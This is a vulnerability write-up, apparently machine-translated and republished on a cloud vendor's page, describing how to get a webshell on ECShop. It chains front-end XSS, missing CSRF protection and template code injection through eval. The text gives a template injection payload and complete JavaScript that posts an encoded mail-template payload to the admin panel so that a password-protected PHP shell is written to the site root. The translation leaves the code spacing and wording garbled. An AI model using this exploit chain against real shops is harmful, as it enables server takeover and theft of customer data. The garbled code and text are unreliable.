Ecshop csrf getshell

Source: Internet
Author: User

0x0 getshell in the background function des/cls_template.php fetch/*** process template files ** @ access public * @ param string $ filename * @ param sting $ cache_id ** @ return sring */function fetch ($ filename, $ cache_id = '') {if (! $ This-> _ seterror) {error_reporting (E_ALL ^ E_NOTICE);} $ this-> _ seterror ++; // If $ filename uses str: if (strncmp ($ filename, 'str: ', 4) = 0) {$ out = $ this-> _ eval ($ this-> fetch_str (substr ($ filename, 4);} You can see that if $ filename uses "str: "At the beginning, call the _ eval () function to execute the code" str: ". However, before execution, the system calls the fetch_str function to find and replace characters. _ Eval (): function _ eval ($ content) {ob_start (); eval ('? '. '> '. Trim ($ content); $ content = ob_get_contents (); ob_end_clean (); return $ content ;} /*** process the string function ** @ access public * @ param string $ source ** @ return string */function fetch_str ($ source) {if (! Defined ('ecs _ admin') {$ source = $ this-> smarty_prefilter_preCompile ($ source) ;}$ source = preg_replace ("/<\? [^> <] + \?> | <\ % [^> <] + \ %> | <Script [^>] + language [^>] * = [^>] * php [^>] *> [^> <] * <\/script \ s *>/iU ", "", $ source); return preg_replace ("/{([^ \} \ {\ n] *)}/e ", "\ $ this-> select ('\ 1');", $ source);} filters php language tags. Now you need to check which code calls this function and find this code: wholesale. php/* submit * // -- submit the order/* then */elseif ($ _ REQUEST ['ac'] = 'submit _ Order') {include_once (ROOT_PATH. 'regiondes/lib_order.php ');................................. ........................................ ..... /* send an email to the seller */if ($ _ CFG ['ser Vice_email ']! = '') {$ Tpl = get_mail_template ('remind _ of_new_order ');........................... ........................................ ..... $ content = $ smarty-> fetch ('str :'. $ tpl ['template _ content']); .......} at the place where the order is submitted, you can see that the Code calls get_mail_template () to obtain the content of the remind_of_new_order template, and then puts it in fetch for execution, if you can control the content of the remind_of_new_order template, let ecshop execute our command. In the background, you can find the email template in template management and change the remind_of_new_order content to "{$ phpinfo () ']; phpinfo ();/*}", then we can see that the code is replaced with "<? Php echo $ this-> _ var ['phpinfo () ']; phpinfo ();/*'];?> ", The code is successfully executed. 0x1 front-end xss front-end filtering is insufficient in some places, resulting in the Construction of malicious javascript to complete xss attacks against the background administrator. After registering a user, you can buy anything at will. In the receiver's information, only the local client is checked in the phone column, without backend filtering, which is easy to detect xss attacks. 0x2 xss + getshell in the background because there is no csrf protection, the xss in the foreground can go to the background and ask the Administrator to help us getshell. The following is the js Implementation of getshell: var Shelldata = 'subject = % C3 % DC % C2 % EB % D5 % D2 % BB % D8 & mail_type = 0 & tpl = 1 & content = % 7B % 24user_name % 27% 5D % signature % 28base64_decode % 28% 27c2hlbGwucGhw % 27% 2Cbase64_decode % 29% signature % 3D % 28% 27% 29% 3 Becho + % 24var % 5B % 29% 24user_name % 7D % 0D % 0A % 3C % 2Fp % 3E % 0D % 0A % 3Cp % 3E % 7B % 24user_name % 7D % C4 % FA % BA % C3 % A3 % A1 % 3Cbr + % 2F % 3E % 0D % 0A % 3Cbr + % 2F % 3E % 0D % 0A % C4 % FA % D2 % D1 % BE % AD % BD % F8 % D0 % D0 % C1 % CB % C3 % DC % C2 % EB % D6 % D8 % D6 % C3 % B5 % C4 % B2 % D9 % D7 % F7 % a3 % AC % C7 % EB % B5 % E3 % BB % F7 % D2 % D4 % CF % C2 % C1 % B4 % BD % D3 % 28% BB % F2 % D5 % DF % B8 % B4 % D6 % C6 % B5 % BD % C4 % FA % B5 % C4 % E4 % AF % C0 % C0 % C6 % F7 % 29% 3A % 3Cbr + % 2F % 3E % 0D % 0A % 3Cbr + % 2F % 3E % 0D % 0A % 3Ca + target % 3D % 22_blank % 22 + href % 3D % 22% 7B % 24reset_email % 7D % 22% 3E % 7B % 24reset_email % 7D % 3C % 2Fa % 3E % 3Cbr + % 2F % 3E % 0D % 0A % 3Cbr + % 2F % 3E % 0D % 0A % D2 % D4 % c8 % B7 % C8 % CF % C4 % FA % B5 % C4 % D0 % C2 % C3 % DC % C2 % EB % D6 % D8 % D6 % C 3% B2 % D9 % D7 % F7 % A3 % A1 % 3Cbr + % 2F % 3E % 0D % 0A % 3Cbr + % 2F % 3E % 0D % 0A % 7B % 24shop_name % 7D % 3Cbr + % 2F % 3E % 0D % 0A % 7B % 24send_date % 7D % 3C % 2Fp % 3E '; try {var xml = window. XMLHttpRequest? (New XMLHttpRequest (): (new ActiveXObject ('Microsoft. xmlhttp'); xml. open ("POST", '/ecshop/upload/admin/mail_template.php? Act = save_template ', false); xml. setRequestHeader ('content-type', 'application/x-www-form-urlencoded'); xml. onreadystatechange = function () {if (xml. readyState = 4) {}}; xml. send (Shelldata);} catch (e) {} upload the js image and reference it or directly reference it from an external website. For test convenience, the order is submitted from the local reference. The Administrator accesses the order and retrieves the password. The shell is generated in the root directory. php, password 207. the administrator can retrieve the password template before accessing the order: the administrator can view the email template after the order administrator accesses the order. Finally, the user can retrieve the password at the front end. A shell statement is generated under the root directory. php


Solution:Filter

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.